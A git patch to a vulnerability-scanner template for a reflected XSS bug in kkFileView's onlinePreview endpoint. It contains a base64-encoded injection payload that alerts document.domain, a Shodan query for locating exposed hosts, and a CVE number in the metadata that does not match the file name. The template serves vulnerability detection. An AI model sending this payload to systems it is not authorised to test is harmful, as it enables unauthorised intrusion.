From cb9ce38ac923045cda5e840ce991c296ab1421c1 Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Wed, 26 Oct 2022 11:34:41 +0530
Subject: [PATCH] Update CVE-2022-40879.yaml

---
 cves/2022/CVE-2022-40879.yaml | 9 ++++++---
 1 file changed, 6 insertions(+), 3 deletions(-)

diff --git a/cves/2022/CVE-2022-40879.yaml b/cves/2022/CVE-2022-40879.yaml
index 891eaf5197..259e338bed 100644
--- a/cves/2022/CVE-2022-40879.yaml
+++ b/cves/2022/CVE-2022-40879.yaml
@@ -15,20 +15,23 @@ info:
     cve-id: CVE-2022-29349
     cwe-id: CWE-79
   metadata:
-    shodan-query: http.html:"kkFileView"
     verified: true
+    shodan-query: http.html:"kkFileView"
   tags: cve,cve2022,kkFileView,xss
 
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/onlinePreview?url=aHR0cHM6Ly93d3cuZ29vZ2xlLjxpbWcgc3JjPTEgb25lcnJvcj1hbGVydCgxKT49PQ=="
+      - "{{BaseURL}}/onlinePreview?url=aHR0cHM6Ly93d3cuZ29vZ2xlLjxpbWcgc3JjPTEgb25lcnJvcj1hbGVydChkb2N1bWVudC5kb21haW4pPj1QUQ=="
 
     matchers-condition: and
     matchers:
       - type: word
+        part: body
         words:
-          - '<img src=1 onerror=alert(1)>'
+          - '<img src=1 onerror=alert(document.domain)>=PQ</p>'
+          - '该文件不'
+        condition: and
 
       - type: word
         part: header